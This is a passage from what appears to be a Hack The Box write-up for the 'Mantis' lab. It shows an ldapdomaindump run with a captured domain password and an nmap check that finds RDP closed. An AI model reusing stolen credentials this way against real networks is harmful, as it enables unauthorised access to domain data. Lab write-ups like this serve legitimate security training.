ldapdomaindump
┌──(kali㉿kali)-[~/…/htb/labs/mantis/ldapdomaindump]
└─$ ldapdomaindump $IP -u "htb.local\james" -p 'J@m3s_P@ssW0rd!' --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finishedWith the domain credential extracted from the MSSQL server, I can dump the whole LDAP domain data with ldapdomaindump
The james user is part of the Remote Desktop Users group
This means I can just RDP to the target host
By default, the RDP operates at port 3389 over TCP
┌──(kali㉿kali)-[~/archive/htb/labs/mantis]
└─$ nmap -p3389 $IP
starting nmap 7.93 ( https://nmap.org ) at 2023-01-10 18:17 CET
Nmap scan report for htb.local (10.10.10.52)
Host is up (0.031s latency).
PORT STATE SERVICE
3389/tcp closed ms-wbt-server
nmap done: 1 IP address (1 host up) scanned in 0.10 seconds
But it seems the RDP is disabled on the target host